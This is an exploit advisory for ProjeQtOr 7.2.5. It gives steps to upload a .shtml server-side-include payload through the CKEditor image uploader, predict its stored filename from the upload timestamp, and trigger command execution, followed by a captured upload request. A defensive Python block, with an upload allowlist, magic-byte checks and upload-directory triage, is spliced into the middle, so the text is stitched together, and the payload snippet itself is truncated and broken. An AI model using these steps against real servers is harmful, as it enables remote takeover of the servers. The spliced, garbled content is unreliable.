ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution

Vulnerability ID: 1368170 Vulnerability type:
Published: 2018-10-25 Updated: 2018-10-25
Platform: PHP CVSS score: N/A
# Exploit Title: ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution
# Date: 2018-10-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact:
# Vendor Homepage:
# Software Link:
# Version: v7.2.5
# Category: Webapps
# Tested on: XAMPP for Linux 7.2.8-0
# Description : ProjeQtOr PMT 7.2.5 and lower versions allow uploading arbitrary ".shtml" files, which
# leads to remote command execution on the remote server.

# 1) Create a file with the below HTML code and save it as .shtml

function fex()
document.location.href="<!--#echo var=DOCUMENT_NAME
<!--#exec cmd=$output -->

# 2) Log in to the ProjeQtOr portal as a privileged user.
# 3) You can perform this operation in the CKEditor fields.
# 4) Click the (Image) button on the Content panel.
# 5) Choose the Upload section and browse to your .shtml file.
# 6) Click "Send it to Server". The script will give you a "This file is not a valid image." error,
# but it still sends the file to the server. We just need to find the file.
# 7) We can read how the uploaded files are named in the
# "/tool/uploadImage.php" file (line 90).


# 8) The name of our file will be built as follows:

Y = Years, numeric, at least 2 digits with leading 0
m = Months, numeric
d = Days, numeric
H = Hours, numeric, at least 2 digits with leading 0
i = Minutes, numeric
s = Seconds, numeric

# We must note the date and time of the upload.

Formula : Y+m+d+H+i+s+_+UserID+_+filename = uploaded file name

# For example, if you uploaded a file called "RCE.shtml" on 2018.10.23 at 01:02:30,
# the file name will be "20181023010230_1_RCE.shtml".

# 9) Finally, all uploaded images are stored under the "/files/images/" folder.
# 10) Verify the exploit: http://domain/files/images/20181023010230_1_RCE.shtml?whoami
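The two defensive consequences of the steps above, as an added example that is not part of the original advisory or of ProjeQtOr's own code: first, the check an image uploader should run before writing anything to disk (the advisory shows the application printing "This file is not a valid image." and saving the file anyway), and second, a triage parser that applies the page's "Y+m+d+H+i+s+_+UserID+_+filename" formula to an existing "/files/images/" listing so a responder can find uploads of non-image types and recover who uploaded them and when. The function names, the allowlist, and the sample listing are my own constructions; the regex assumes all six date fields are zero-padded, as in the page's "20181023010230" example.

```python
import re
from datetime import datetime

# --- 1. Upload-time validation (hypothetical; what the handler should do) ---

# Extensions the image uploader is allowed to store. Anything else is rejected
# before the file reaches the web root, so ".shtml"/".php" never land there.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Real file signatures for the accepted formats; the declared extension must
# agree with the bytes actually uploaded.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def extension_of(filename):
    """Lower-case extension after the last dot, with any path stripped; '' if none."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in name:
        return ""
    return name.rsplit(".", 1)[1].lower()


def validate_image_upload(filename, data):
    """Return (accepted, reason). Reject first; only accepted files get written."""
    ext = extension_of(filename)
    if not ext:
        return False, "no extension"
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not in allowlist"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"
    return True, "ok"


# --- 2. Post-incident triage of the upload directory ---

# Stored-name shape from the advisory: YmdHis + "_" + UserID + "_" + original name.
STORED_NAME = re.compile(r"^(\d{14})_(\d+)_(.+)$")


def parse_stored_name(stored):
    """Split a stored upload name into upload time, user id and original name."""
    m = STORED_NAME.match(stored)
    if not m:
        return None  # not produced by this uploader; leave for manual review
    when = datetime.strptime(m.group(1), "%Y%m%d%H%M%S")
    return {"stored": stored, "uploaded_at": when,
            "user_id": int(m.group(2)), "original": m.group(3)}


def triage_listing(names):
    """Return parsed entries whose extension is not an accepted image type."""
    flagged = []
    for n in names:
        info = parse_stored_name(n)
        if info is not None and extension_of(info["original"]) not in ALLOWED_EXTENSIONS:
            flagged.append(info)
    return flagged


# Constructed directory listing; the first entry mirrors the page's example name.
SAMPLE_LISTING = [
    "20181023010230_1_RCE.shtml",
    "20181022153012_4_logo.png",
    "20181023090001_2_notes.php",
    "README.txt",
]

if __name__ == "__main__":
    print(validate_image_upload("RCE.shtml", b"<!--#exec"))
    for hit in triage_listing(SAMPLE_LISTING):
        print(f"{hit['stored']}: user {hit['user_id']} at {hit['uploaded_at']}")
```

The triage output gives the user id and timestamp to correlate with the application's login and request logs. Independently of the upload check, serving the upload directory with server-side includes disabled (Apache `Options -Includes`, and no handler mapped for `.shtml`) removes the execution path even for a file that slips past validation.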

The request:

Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/view/main.php
Cookie: projeqtor=cd3d5cf676e8598e742925cfd2343696;
Connection: keep-alive
Content-Type: multipart/form-data;
Content-Length: 550
Content-Disposition: form-data; name="upload"; filename="RCE.shtml"
Content-Type: text/html

[shtml file content]
Content-Disposition: form-data; name="ckCsrfToken"


HTTP/1.1 200 OK
Date: Mon, 23 Oct 2018 01:02:30 GMT